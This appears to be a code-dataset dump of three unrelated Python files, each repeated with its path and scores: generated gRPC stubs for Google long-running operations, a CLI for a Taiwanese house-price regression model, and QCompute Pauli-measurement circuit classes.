grpc.unary_unary_rpc_method_handler( servicer.CancelOperation, request_deserializer=CancelOperationRequest.FromString, response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString, ), 'DeleteOperation': grpc.unary_unary_rpc_method_handler( servicer.DeleteOperation, request_deserializer=DeleteOperationRequest.FromString, response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString, ), } generic_handler = grpc.method_handlers_generic_handler( 'google.longrunning.Operations', rpc_method_handlers) server.add_generic_rpc_handlers((generic_handler,)) class BetaOperationsServicer(object): """Manages long-running operations with an API service. When an API method normally takes long time to complete, it can be designed to return [Operation][google.longrunning.Operation] to the client, and the client can use this interface to receive the real response asynchronously by polling the operation resource, or using `google.watcher.v1.Watcher` interface to watch the response, or pass the operation resource to another API (such as Google Cloud Pub/Sub API) to receive the response. Any API service that returns long-running operations should implement the `Operations` interface so developers can have a consistent client experience. """ def GetOperation(self, request, context): """Gets the latest state of a long-running operation. Clients may use this method to poll the operation result at intervals as recommended by the API service. """ context.code(beta_interfaces.StatusCode.UNIMPLEMENTED) def ListOperations(self, request, context): """Lists operations that match the specified filter in the request. If the server doesn't support this method, it returns `google.rpc.Code.UNIMPLEMENTED`. """ context.code(beta_interfaces.StatusCode.UNIMPLEMENTED) def CancelOperation(self, request, context): """Starts asynchronous cancellation on a long-running operation. The server makes a best effort to cancel the operation, but success is not guaranteed. If the server doesn't support this method, it returns `google.rpc.Code.UNIMPLEMENTED`. Clients may use [Operations.GetOperation] or other methods to check whether the cancellation succeeded or the operation completed despite cancellation. """ context.code(beta_interfaces.StatusCode.UNIMPLEMENTED) def DeleteOperation(self, request, context): """Deletes a long-running operation. It indicates the client is no longer interested in the operation result. It does not cancel the operation. """ context.code(beta_interfaces.StatusCode.UNIMPLEMENTED) class BetaOperationsStub(object): """Manages long-running operations with an API service. When an API method normally takes long time to complete, it can be designed to return [Operation][google.longrunning.Operation] to the client, and the client can use this interface to receive the real response asynchronously by polling the operation resource, or using `google.watcher.v1.Watcher` interface to watch the response, or pass the operation resource to another API (such as Google Cloud Pub/Sub API) to receive the response. Any API service that returns long-running operations should implement the `Operations` interface so developers can have a consistent client experience. """ def GetOperation(self, request, timeout, metadata=None, with_call=False, protocol_options=None): """Gets the latest state of a long-running operation. Clients may use this method to poll the operation result at intervals as recommended by the API service. """ raise NotImplementedError() GetOperation.future = None def ListOperations(self, request, timeout, metadata=None, with_call=False, protocol_options=None): """Lists operations that match the specified filter in the request. If the server doesn't support this method, it returns `google.rpc.Code.UNIMPLEMENTED`. """ raise NotImplementedError() ListOperations.future = None def CancelOperation(self, request, timeout, metadata=None, with_call=False, protocol_options=None): """Starts asynchronous cancellation on a long-running operation. The server makes a best effort to cancel the operation, but success is not guaranteed. If the server doesn't support this method, it returns `google.rpc.Code.UNIMPLEMENTED`. Clients may use [Operations.GetOperation] or other methods to check whether the cancellation succeeded or the operation completed despite cancellation. """ raise NotImplementedError() CancelOperation.future = None def DeleteOperation(self, request, timeout, metadata=None, with_call=False, protocol_options=None): """Deletes a long-running operation. It indicates the client is no longer interested in the operation result. It does not cancel the operation. """ raise NotImplementedError() DeleteOperation.future = None def beta_create_Operations_server(servicer, pool=None, pool_size=None, default_timeout=None, maximum_timeout=None): request_deserializers = { ('google.longrunning.Operations', 'CancelOperation'): CancelOperationRequest.FromString, ('google.longrunning.Operations', 'DeleteOperation'): DeleteOperationRequest.FromString, ('google.longrunning.Operations', 'GetOperation'): GetOperationRequest.FromString, ('google.longrunning.Operations', 'ListOperations'): ListOperationsRequest.FromString, } response_serializers = { ('google.longrunning.Operations', 'CancelOperation'): google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString, ('google.longrunning.Operations', 'DeleteOperation'): google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString, ('google.longrunning.Operations', 'GetOperation'): Operation.SerializeToString, ('google.longrunning.Operations', 'ListOperations'): ListOperationsResponse.SerializeToString, } method_implementations = { ('google.longrunning.Operations', 'CancelOperation'): face_utilities.unary_unary_inline(servicer.CancelOperation), ('google.longrunning.Operations', 'DeleteOperation'): face_utilities.unary_unary_inline(servicer.DeleteOperation), ('google.longrunning.Operations', 'GetOperation'): face_utilities.unary_unary_inline(servicer.GetOperation), ('google.longrunning.Operations', 'ListOperations'): face_utilities.unary_unary_inline(servicer.ListOperations), } server_options = beta_implementations.server_options(request_deserializers=request_deserializers, response_serializers=response_serializers, thread_pool=pool, thread_pool_size=pool_size, default_timeout=default_timeout, maximum_timeout=maximum_timeout) return beta_implementations.server(method_implementations, options=server_options) def beta_create_Operations_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None): request_serializers = { ('google.longrunning.Operations', 'CancelOperation'): CancelOperationRequest.SerializeToString, ('google.longrunning.Operations', 'DeleteOperation'): DeleteOperationRequest.SerializeToString, ('google.longrunning.Operations', 'GetOperation'): GetOperationRequest.SerializeToString, ('google.longrunning.Operations', 'ListOperations'): ListOperationsRequest.SerializeToString, } response_deserializers = { ('google.longrunning.Operations', 'CancelOperation'): google_dot_protobuf_dot_empty__pb2.Empty.FromString, ('google.longrunning.Operations', 'DeleteOperation'): google_dot_protobuf_dot_empty__pb2.Empty.FromString, ('google.longrunning.Operations', 'GetOperation'): Operation.FromString, ('google.longrunning.Operations', 'ListOperations'): ListOperationsResponse.FromString, } cardinalities = { 'CancelOperation': cardinality.Cardinality.UNARY_UNARY, 'DeleteOperation': cardinality.Cardinality.UNARY_UNARY, 'GetOperation': cardinality.Cardinality.UNARY_UNARY, 'ListOperations': cardinality.Cardinality.UNARY_UNARY, } stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size) return beta_implementations.dynamic_stub(channel, 'google.longrunning.Operations', cardinalities, options=stub_options)
Janaagraha Bot/venv/Lib/site-packages/gcloud/bigtable/_generated_v2/operations_grpc_pb2.py
from google.longrunning.operations_pb2 import ( CancelOperationRequest, DeleteOperationRequest, GetOperationRequest, ListOperationsRequest, ListOperationsResponse, Operation, google_dot_protobuf_dot_empty__pb2, ) from grpc.beta import implementations as beta_implementations from grpc.beta import interfaces as beta_interfaces from grpc.framework.common import cardinality from grpc.framework.interfaces.face import utilities as face_utilities class OperationsStub(object): """Manages long-running operations with an API service. When an API method normally takes long time to complete, it can be designed to return [Operation][google.longrunning.Operation] to the client, and the client can use this interface to receive the real response asynchronously by polling the operation resource, or using `google.watcher.v1.Watcher` interface to watch the response, or pass the operation resource to another API (such as Google Cloud Pub/Sub API) to receive the response. Any API service that returns long-running operations should implement the `Operations` interface so developers can have a consistent client experience. """ def __init__(self, channel): """Constructor. Args: channel: A grpc.Channel. """ self.GetOperation = channel.unary_unary( '/google.longrunning.Operations/GetOperation', request_serializer=GetOperationRequest.SerializeToString, response_deserializer=Operation.FromString, ) self.ListOperations = channel.unary_unary( '/google.longrunning.Operations/ListOperations', request_serializer=ListOperationsRequest.SerializeToString, response_deserializer=ListOperationsResponse.FromString, ) self.CancelOperation = channel.unary_unary( '/google.longrunning.Operations/CancelOperation', request_serializer=CancelOperationRequest.SerializeToString, response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString, ) self.DeleteOperation = channel.unary_unary( '/google.longrunning.Operations/DeleteOperation', request_serializer=DeleteOperationRequest.SerializeToString, response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString, ) class OperationsServicer(object): """Manages long-running operations with an API service. When an API method normally takes long time to complete, it can be designed to return [Operation][google.longrunning.Operation] to the client, and the client can use this interface to receive the real response asynchronously by polling the operation resource, or using `google.watcher.v1.Watcher` interface to watch the response, or pass the operation resource to another API (such as Google Cloud Pub/Sub API) to receive the response. Any API service that returns long-running operations should implement the `Operations` interface so developers can have a consistent client experience. """ def GetOperation(self, request, context): """Gets the latest state of a long-running operation. Clients may use this method to poll the operation result at intervals as recommended by the API service. """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def ListOperations(self, request, context): """Lists operations that match the specified filter in the request. If the server doesn't support this method, it returns `google.rpc.Code.UNIMPLEMENTED`. """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def CancelOperation(self, request, context): """Starts asynchronous cancellation on a long-running operation. The server makes a best effort to cancel the operation, but success is not guaranteed. If the server doesn't support this method, it returns `google.rpc.Code.UNIMPLEMENTED`. Clients may use [Operations.GetOperation] or other methods to check whether the cancellation succeeded or the operation completed despite cancellation. """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def DeleteOperation(self, request, context): """Deletes a long-running operation. It indicates the client is no longer interested in the operation result. It does not cancel the operation. """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def add_OperationsServicer_to_server(servicer, server): rpc_method_handlers = { 'GetOperation': grpc.unary_unary_rpc_method_handler( servicer.GetOperation, request_deserializer=GetOperationRequest.FromString, response_serializer=Operation.SerializeToString, ), 'ListOperations': grpc.unary_unary_rpc_method_handler( servicer.ListOperations, request_deserializer=ListOperationsRequest.FromString, response_serializer=ListOperationsResponse.SerializeToString, ), 'CancelOperation': grpc.unary_unary_rpc_method_handler( servicer.CancelOperation, request_deserializer=CancelOperationRequest.FromString, response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString, ), 'DeleteOperation': grpc.unary_unary_rpc_method_handler( servicer.DeleteOperation, request_deserializer=DeleteOperationRequest.FromString, response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString, ), } generic_handler = grpc.method_handlers_generic_handler( 'google.longrunning.Operations', rpc_method_handlers) server.add_generic_rpc_handlers((generic_handler,)) class BetaOperationsServicer(object): """Manages long-running operations with an API service. When an API method normally takes long time to complete, it can be designed to return [Operation][google.longrunning.Operation] to the client, and the client can use this interface to receive the real response asynchronously by polling the operation resource, or using `google.watcher.v1.Watcher` interface to watch the response, or pass the operation resource to another API (such as Google Cloud Pub/Sub API) to receive the response. Any API service that returns long-running operations should implement the `Operations` interface so developers can have a consistent client experience. """ def GetOperation(self, request, context): """Gets the latest state of a long-running operation. Clients may use this method to poll the operation result at intervals as recommended by the API service. """ context.code(beta_interfaces.StatusCode.UNIMPLEMENTED) def ListOperations(self, request, context): """Lists operations that match the specified filter in the request. If the server doesn't support this method, it returns `google.rpc.Code.UNIMPLEMENTED`. """ context.code(beta_interfaces.StatusCode.UNIMPLEMENTED) def CancelOperation(self, request, context): """Starts asynchronous cancellation on a long-running operation. The server makes a best effort to cancel the operation, but success is not guaranteed. If the server doesn't support this method, it returns `google.rpc.Code.UNIMPLEMENTED`. Clients may use [Operations.GetOperation] or other methods to check whether the cancellation succeeded or the operation completed despite cancellation. """ context.code(beta_interfaces.StatusCode.UNIMPLEMENTED) def DeleteOperation(self, request, context): """Deletes a long-running operation. It indicates the client is no longer interested in the operation result. It does not cancel the operation. """ context.code(beta_interfaces.StatusCode.UNIMPLEMENTED) class BetaOperationsStub(object): """Manages long-running operations with an API service. When an API method normally takes long time to complete, it can be designed to return [Operation][google.longrunning.Operation] to the client, and the client can use this interface to receive the real response asynchronously by polling the operation resource, or using `google.watcher.v1.Watcher` interface to watch the response, or pass the operation resource to another API (such as Google Cloud Pub/Sub API) to receive the response. Any API service that returns long-running operations should implement the `Operations` interface so developers can have a consistent client experience. """ def GetOperation(self, request, timeout, metadata=None, with_call=False, protocol_options=None): """Gets the latest state of a long-running operation. Clients may use this method to poll the operation result at intervals as recommended by the API service. """ raise NotImplementedError() GetOperation.future = None def ListOperations(self, request, timeout, metadata=None, with_call=False, protocol_options=None): """Lists operations that match the specified filter in the request. If the server doesn't support this method, it returns `google.rpc.Code.UNIMPLEMENTED`. """ raise NotImplementedError() ListOperations.future = None def CancelOperation(self, request, timeout, metadata=None, with_call=False, protocol_options=None): """Starts asynchronous cancellation on a long-running operation. The server makes a best effort to cancel the operation, but success is not guaranteed. If the server doesn't support this method, it returns `google.rpc.Code.UNIMPLEMENTED`. Clients may use [Operations.GetOperation] or other methods to check whether the cancellation succeeded or the operation completed despite cancellation. """ raise NotImplementedError() CancelOperation.future = None def DeleteOperation(self, request, timeout, metadata=None, with_call=False, protocol_options=None): """Deletes a long-running operation. It indicates the client is no longer interested in the operation result. It does not cancel the operation. """ raise NotImplementedError() DeleteOperation.future = None def beta_create_Operations_server(servicer, pool=None, pool_size=None, default_timeout=None, maximum_timeout=None): request_deserializers = { ('google.longrunning.Operations', 'CancelOperation'): CancelOperationRequest.FromString, ('google.longrunning.Operations', 'DeleteOperation'): DeleteOperationRequest.FromString, ('google.longrunning.Operations', 'GetOperation'): GetOperationRequest.FromString, ('google.longrunning.Operations', 'ListOperations'): ListOperationsRequest.FromString, } response_serializers = { ('google.longrunning.Operations', 'CancelOperation'): google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString, ('google.longrunning.Operations', 'DeleteOperation'): google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString, ('google.longrunning.Operations', 'GetOperation'): Operation.SerializeToString, ('google.longrunning.Operations', 'ListOperations'): ListOperationsResponse.SerializeToString, } method_implementations = { ('google.longrunning.Operations', 'CancelOperation'): face_utilities.unary_unary_inline(servicer.CancelOperation), ('google.longrunning.Operations', 'DeleteOperation'): face_utilities.unary_unary_inline(servicer.DeleteOperation), ('google.longrunning.Operations', 'GetOperation'): face_utilities.unary_unary_inline(servicer.GetOperation), ('google.longrunning.Operations', 'ListOperations'): face_utilities.unary_unary_inline(servicer.ListOperations), } server_options = beta_implementations.server_options(request_deserializers=request_deserializers, response_serializers=response_serializers, thread_pool=pool, thread_pool_size=pool_size, default_timeout=default_timeout, maximum_timeout=maximum_timeout) return beta_implementations.server(method_implementations, options=server_options) def beta_create_Operations_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None): request_serializers = { ('google.longrunning.Operations', 'CancelOperation'): CancelOperationRequest.SerializeToString, ('google.longrunning.Operations', 'DeleteOperation'): DeleteOperationRequest.SerializeToString, ('google.longrunning.Operations', 'GetOperation'): GetOperationRequest.SerializeToString, ('google.longrunning.Operations', 'ListOperations'): ListOperationsRequest.SerializeToString, } response_deserializers = { ('google.longrunning.Operations', 'CancelOperation'): google_dot_protobuf_dot_empty__pb2.Empty.FromString, ('google.longrunning.Operations', 'DeleteOperation'): google_dot_protobuf_dot_empty__pb2.Empty.FromString, ('google.longrunning.Operations', 'GetOperation'): Operation.FromString, ('google.longrunning.Operations', 'ListOperations'): ListOperationsResponse.FromString, } cardinalities = { 'CancelOperation': cardinality.Cardinality.UNARY_UNARY, 'DeleteOperation': cardinality.Cardinality.UNARY_UNARY, 'GetOperation': cardinality.Cardinality.UNARY_UNARY, 'ListOperations': cardinality.Cardinality.UNARY_UNARY, } stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size) return beta_implementations.dynamic_stub(channel, 'google.longrunning.Operations', cardinalities, options=stub_options)
0.731538
0.138928
import os import sys import subprocess import pickle import numpy from distutils.util import strtobool from lib.Regression import Regression class userInterface(): def __init__(self): self.inputTitle = ['縣市', '鄉鎮市區', '有無管理組織', '建物型態', '土地移轉總面積平方公尺', '車位移轉總面積平方公尺', '建物移轉總面積平方公尺', '建築完成年月', '交易年月'] self.defaultPath = "regression_output" self.regressions = dict() self.inputVars = dict() self.quantizedVars = dict() self.predictPrice = int() self.readRegressions() def readRegressions(self, path=None): path = self.defaultPath + "/.regressions" if path is None else 0 if not os.path.isfile(path): print ("There is not regressions. Automatically generate.") cmd = ["python3", "regression_generator.py"] p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE) p.communicate() print ("Successfully generate!") f = open(path, "rb") self.regressions = pickle.load(f) f.close() def yesNoQuery(self, question): print(question, end = "\t") while True: try: return strtobool(input().lower()) except ValueError: print ("Please repond with y or n") def __isfloat(self, inStr): try: float(inStr) return True except ValueError: return False def __handleInputType(self, inStr): if inStr.isnumeric(): inStr = int(inStr) elif self.__isfloat(inStr): inStr = float(inStr) return inStr def userInput(self): for title in self.inputTitle: self.inputVars[title] = self.__handleInputType(input(title + ":")) def fileInput(self, path): try: f = open(path, "r") for line, title in zip(f.read().splitlines(), self.inputTitle): self.inputVars[title] = self.__handleInputType(line) if len(self.inputVars) != len(self.inputTitle): print ("Your input file contains wrong parameter numbers!!!") sys.exit(0) except FileNotFoundError: print ("Your input file does not exist!!!") sys.exit(0) def quantize(self): city = self.inputVars['縣市'][:3] region = self.inputVars['鄉鎮市區'] reg = Regression() self.quantizedVars['縣市'] = city self.quantizedVars['鄉鎮市區'] = region self.quantizedVars['variables'] = numpy.array(reg.quantizeForRec(self.inputVars, city)) return self def predict(self): city = self.quantizedVars['縣市'] region = self.quantizedVars['鄉鎮市區'] coefficient = self.regressions[city][region] self.predictedPrice = numpy.dot(self.quantizedVars["variables"], coefficient) def getPredictedPrice(self): return self.predictedPrice def printReport(self): path = self.defaultPath + "/report/" city = self.quantizedVars["縣市"] region = self.quantizedVars["鄉鎮市區"] print("city : ", city) print("region : ", region) if os.path.exists(path + city): path += city + "/" if os.path.exists(path + region): path += region + "/" + region + ".txt" else: path += city + ".txt" else: path += "total.txt" f = open(path) print (f.read()) f.close()
lib/userInterface.py
import os import sys import subprocess import pickle import numpy from distutils.util import strtobool from lib.Regression import Regression class userInterface(): def __init__(self): self.inputTitle = ['縣市', '鄉鎮市區', '有無管理組織', '建物型態', '土地移轉總面積平方公尺', '車位移轉總面積平方公尺', '建物移轉總面積平方公尺', '建築完成年月', '交易年月'] self.defaultPath = "regression_output" self.regressions = dict() self.inputVars = dict() self.quantizedVars = dict() self.predictPrice = int() self.readRegressions() def readRegressions(self, path=None): path = self.defaultPath + "/.regressions" if path is None else 0 if not os.path.isfile(path): print ("There is not regressions. Automatically generate.") cmd = ["python3", "regression_generator.py"] p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE) p.communicate() print ("Successfully generate!") f = open(path, "rb") self.regressions = pickle.load(f) f.close() def yesNoQuery(self, question): print(question, end = "\t") while True: try: return strtobool(input().lower()) except ValueError: print ("Please repond with y or n") def __isfloat(self, inStr): try: float(inStr) return True except ValueError: return False def __handleInputType(self, inStr): if inStr.isnumeric(): inStr = int(inStr) elif self.__isfloat(inStr): inStr = float(inStr) return inStr def userInput(self): for title in self.inputTitle: self.inputVars[title] = self.__handleInputType(input(title + ":")) def fileInput(self, path): try: f = open(path, "r") for line, title in zip(f.read().splitlines(), self.inputTitle): self.inputVars[title] = self.__handleInputType(line) if len(self.inputVars) != len(self.inputTitle): print ("Your input file contains wrong parameter numbers!!!") sys.exit(0) except FileNotFoundError: print ("Your input file does not exist!!!") sys.exit(0) def quantize(self): city = self.inputVars['縣市'][:3] region = self.inputVars['鄉鎮市區'] reg = Regression() self.quantizedVars['縣市'] = city self.quantizedVars['鄉鎮市區'] = region self.quantizedVars['variables'] = numpy.array(reg.quantizeForRec(self.inputVars, city)) return self def predict(self): city = self.quantizedVars['縣市'] region = self.quantizedVars['鄉鎮市區'] coefficient = self.regressions[city][region] self.predictedPrice = numpy.dot(self.quantizedVars["variables"], coefficient) def getPredictedPrice(self): return self.predictedPrice def printReport(self): path = self.defaultPath + "/report/" city = self.quantizedVars["縣市"] region = self.quantizedVars["鄉鎮市區"] print("city : ", city) print("region : ", region) if os.path.exists(path + city): path += city + "/" if os.path.exists(path + region): path += region + "/" + region + ".txt" else: path += city + ".txt" else: path += "total.txt" f = open(path) print (f.read()) f.close()
0.147832
0.171876
from typing import Dict, List from copy import deepcopy import itertools import numpy as np from QCompute.QPlatform.QEnv import QEnv from QCompute.QPlatform.QRegPool import QRegPool from QCompute.QPlatform.QOperation.RotationGate import RX, RY from QCompute.QPlatform.QOperation.FixedGate import H, S, CX from QCompute.QPlatform.QOperation.Measure import MeasureZ from qapp.utils import grouping_hamiltonian from .basic_circuit import BasicCircuit class PauliMeasurementCircuit(BasicCircuit): """ Pauli Measurement Circuit class """ def __init__(self, num: int, pauli_terms: str): """The constructor of the PauliMeasurementCircuit class :param num: Number of qubits :param pauli_terms: Pauli terms to be measured """ super().__init__(num) self._pauli_terms = deepcopy(pauli_terms) def add_circuit(self, q: QRegPool, pauli_str: str): """Adds the pauli measurement circuit to the register :param q: Quantum register to which this circuit is added :param pauli_str: Pauli string to be measured """ for i in range(self._num): # Set up Pauli measurement circuit if pauli_str[i] == 'x': RY(-np.pi / 2)(q[i]) elif pauli_str[i] == 'y': RX(np.pi / 2)(q[i]) # Measure all qubits MeasureZ(q, list(range(len(q)))) def get_expectation(self, preceding_circuits: List[BasicCircuit], shots: int, backend: str) -> float: """Computes the expectation value of the Pauli terms :param preceding_circuit: Circuit precedes the measurement circuit :param shots: Number of measurement shots :param backend: Backend to be used in this task :return: Expectation value of the Pauli terms """ expectation = 0 for coeff, pauli_str in self._pauli_terms: # Return coeff if all Pauli operators are I if pauli_str.lower().count('i') == len(pauli_str): expectation += coeff continue active_qubits = [i for i, c in enumerate(pauli_str) if c != 'i'] env = QEnv() env.backend(backend) q = env.Q.createList(self._num) # Add circuit for circuit in preceding_circuits: circuit.add_circuit(q) self.add_circuit(q, pauli_str.lower()) # Submit job counts = env.commit(shots, fetchMeasure=True)['counts'] # Expectation filtered_counts = [(counts[key], [key[-i - 1] for i in active_qubits]) for key in counts] expecval = sum([((-1) ** key.count('1')) * val / shots for val, key in filtered_counts]) expectation += coeff * expecval return expectation class PauliMeasurementCircuitWithAncilla(BasicCircuit): """Pauli Measurement Circuit with Ancilla class """ def __init__(self, num: int, pauli_terms: str): """The constructor of the PauliMeasurementCircuitWithAncilla class :param num: Number of qubits :param pauli_terms: Pauli terms to be measured """ super().__init__(num) self._pauli_terms = pauli_terms def add_circuit(self, q: QRegPool, pauli_str: str): """Adds the pauli measurement circuit to the register :param q: Quantum register to which this circuit is added :param pauli_str: Pauli string to be measured """ for i in range(self._num): # Set up Pauli measurement circuit if pauli_str[i] == 'x': H(q[i]) CX(q[i], q[-1]) elif pauli_str[i] == 'y': S(q[i]) H(q[i]) CX(q[i], q[-1]) elif pauli_str[i] == 'z': CX(q[i], q[-1]) # Measure the ancilla qubit MeasureZ([q[-1]], [0]) def get_expectation(self, preceding_circuits: List[BasicCircuit], shots: int, backend: str) -> float: """Computes the expectation value of the Pauli terms :param preceding_circuit: Circuit precedes the measurement circuit :param shots: Number of measurement shots :param backend: Backend to be used in this task :return: Expectation value of the Pauli terms """ expectation = 0 for coeff, pauli_str in self._pauli_terms: # Return coeff if all Pauli operators are I if pauli_str.lower().count('i') == len(pauli_str): expectation += coeff continue env = QEnv() env.backend(backend) q = env.Q.createList(self._num + 1) # Add circuit for circuit in preceding_circuits: circuit.add_circuit(q[:self._num]) self.add_circuit(q, pauli_str.lower()) # Submit job counts = env.commit(shots, fetchMeasure=True)['counts'] # Expectation expecval = (counts.get('0', 0) - counts.get('1', 0)) / shots expectation += coeff * expecval return expectation class SimultaneousPauliMeasurementCircuit(BasicCircuit): """Simultaneous Pauli Measurement Circuit for Qubitwise Commute Pauli Terms """ def __init__(self, num: int, pauli_terms: List): """The constructor of the SimultaneousPauliMeasurementCircuit class :param num: Number of qubits :param pauli_terms: Pauli terms to be measured """ super().__init__(num) self._pauli_terms = pauli_terms def add_circuit(self, q: 'QRegPool', clique: List): """Adds the simultaneous pauli measurement circuit to the register :param q: Quantum register to which this circuit is added :param clique: Clique of Pauli terms to be measured together """ for index in range(self._num): # Set up Pauli measurement circuit term = [pauli[index] for _, pauli in clique] if 'x' in term: RY(-np.pi / 2)(q[index]) elif 'y' in term: RX(np.pi / 2)(q[index]) # Measure all qubits MeasureZ(q, range(self._num)) def _single_clique_expectation(self, clique: List, counts: Dict, shots: int) -> float: """Computes the expectation value of the target Pauli clique """ # Reformulate the measurement counts in the form of a probability list basis = [''.join(x) for x in itertools.product('01', repeat=self._num)] prob = [counts.get(key, 0) / shots for key in basis] # Calculate the expectation value of each term in the pauli_clique according to the same measured results expecval = 0 for coeff, pauli_str in clique: first = True for operator in pauli_str: if not first: eigenvalues = np.kron(np.array([1.0, 1.0 if operator == 'i' else -1.0]), eigenvalues) else: eigenvalues = np.array([1.0, 1.0 if operator == 'i' else -1.0]) first = False expecval_index = np.dot(eigenvalues, prob) expecval += coeff * expecval_index return expecval def get_expectation(self, preceding_circuits: List[BasicCircuit], shots: int, backend: str) -> float: """Computes the expectation value of the Pauli terms :param preceding_circuit: Circuit precedes the measurement circuit :param shots: Number of measurement shots :param backend: Backend to be used in this task :return: Expectation value of the Pauli terms """ # Generate Pauli cliques for the hamiltonian graph cliques = grouping_hamiltonian(self._pauli_terms) # Calculate each expectation = 0 for pauli_clique in cliques: env = QEnv() env.backend(backend) q = env.Q.createList(self._num) # Add circuit for circuit in preceding_circuits: circuit.add_circuit(q) self.add_circuit(q, pauli_clique) # Submit job counts = env.commit(shots, fetchMeasure=True)['counts'] # Expectation result = self._single_clique_expectation(pauli_clique, counts, shots) expectation += result return expectation
Example/QAPP/qapp/circuit/pauli_measurement_circuit.py
from typing import Dict, List from copy import deepcopy import itertools import numpy as np from QCompute.QPlatform.QEnv import QEnv from QCompute.QPlatform.QRegPool import QRegPool from QCompute.QPlatform.QOperation.RotationGate import RX, RY from QCompute.QPlatform.QOperation.FixedGate import H, S, CX from QCompute.QPlatform.QOperation.Measure import MeasureZ from qapp.utils import grouping_hamiltonian from .basic_circuit import BasicCircuit class PauliMeasurementCircuit(BasicCircuit): """ Pauli Measurement Circuit class """ def __init__(self, num: int, pauli_terms: str): """The constructor of the PauliMeasurementCircuit class :param num: Number of qubits :param pauli_terms: Pauli terms to be measured """ super().__init__(num) self._pauli_terms = deepcopy(pauli_terms) def add_circuit(self, q: QRegPool, pauli_str: str): """Adds the pauli measurement circuit to the register :param q: Quantum register to which this circuit is added :param pauli_str: Pauli string to be measured """ for i in range(self._num): # Set up Pauli measurement circuit if pauli_str[i] == 'x': RY(-np.pi / 2)(q[i]) elif pauli_str[i] == 'y': RX(np.pi / 2)(q[i]) # Measure all qubits MeasureZ(q, list(range(len(q)))) def get_expectation(self, preceding_circuits: List[BasicCircuit], shots: int, backend: str) -> float: """Computes the expectation value of the Pauli terms :param preceding_circuit: Circuit precedes the measurement circuit :param shots: Number of measurement shots :param backend: Backend to be used in this task :return: Expectation value of the Pauli terms """ expectation = 0 for coeff, pauli_str in self._pauli_terms: # Return coeff if all Pauli operators are I if pauli_str.lower().count('i') == len(pauli_str): expectation += coeff continue active_qubits = [i for i, c in enumerate(pauli_str) if c != 'i'] env = QEnv() env.backend(backend) q = env.Q.createList(self._num) # Add circuit for circuit in preceding_circuits: circuit.add_circuit(q) self.add_circuit(q, pauli_str.lower()) # Submit job counts = env.commit(shots, fetchMeasure=True)['counts'] # Expectation filtered_counts = [(counts[key], [key[-i - 1] for i in active_qubits]) for key in counts] expecval = sum([((-1) ** key.count('1')) * val / shots for val, key in filtered_counts]) expectation += coeff * expecval return expectation class PauliMeasurementCircuitWithAncilla(BasicCircuit): """Pauli Measurement Circuit with Ancilla class """ def __init__(self, num: int, pauli_terms: str): """The constructor of the PauliMeasurementCircuitWithAncilla class :param num: Number of qubits :param pauli_terms: Pauli terms to be measured """ super().__init__(num) self._pauli_terms = pauli_terms def add_circuit(self, q: QRegPool, pauli_str: str): """Adds the pauli measurement circuit to the register :param q: Quantum register to which this circuit is added :param pauli_str: Pauli string to be measured """ for i in range(self._num): # Set up Pauli measurement circuit if pauli_str[i] == 'x': H(q[i]) CX(q[i], q[-1]) elif pauli_str[i] == 'y': S(q[i]) H(q[i]) CX(q[i], q[-1]) elif pauli_str[i] == 'z': CX(q[i], q[-1]) # Measure the ancilla qubit MeasureZ([q[-1]], [0]) def get_expectation(self, preceding_circuits: List[BasicCircuit], shots: int, backend: str) -> float: """Computes the expectation value of the Pauli terms :param preceding_circuit: Circuit precedes the measurement circuit :param shots: Number of measurement shots :param backend: Backend to be used in this task :return: Expectation value of the Pauli terms """ expectation = 0 for coeff, pauli_str in self._pauli_terms: # Return coeff if all Pauli operators are I if pauli_str.lower().count('i') == len(pauli_str): expectation += coeff continue env = QEnv() env.backend(backend) q = env.Q.createList(self._num + 1) # Add circuit for circuit in preceding_circuits: circuit.add_circuit(q[:self._num]) self.add_circuit(q, pauli_str.lower()) # Submit job counts = env.commit(shots, fetchMeasure=True)['counts'] # Expectation expecval = (counts.get('0', 0) - counts.get('1', 0)) / shots expectation += coeff * expecval return expectation class SimultaneousPauliMeasurementCircuit(BasicCircuit): """Simultaneous Pauli Measurement Circuit for Qubitwise Commute Pauli Terms """ def __init__(self, num: int, pauli_terms: List): """The constructor of the SimultaneousPauliMeasurementCircuit class :param num: Number of qubits :param pauli_terms: Pauli terms to be measured """ super().__init__(num) self._pauli_terms = pauli_terms def add_circuit(self, q: 'QRegPool', clique: List): """Adds the simultaneous pauli measurement circuit to the register :param q: Quantum register to which this circuit is added :param clique: Clique of Pauli terms to be measured together """ for index in range(self._num): # Set up Pauli measurement circuit term = [pauli[index] for _, pauli in clique] if 'x' in term: RY(-np.pi / 2)(q[index]) elif 'y' in term: RX(np.pi / 2)(q[index]) # Measure all qubits MeasureZ(q, range(self._num)) def _single_clique_expectation(self, clique: List, counts: Dict, shots: int) -> float: """Computes the expectation value of the target Pauli clique """ # Reformulate the measurement counts in the form of a probability list basis = [''.join(x) for x in itertools.product('01', repeat=self._num)] prob = [counts.get(key, 0) / shots for key in basis] # Calculate the expectation value of each term in the pauli_clique according to the 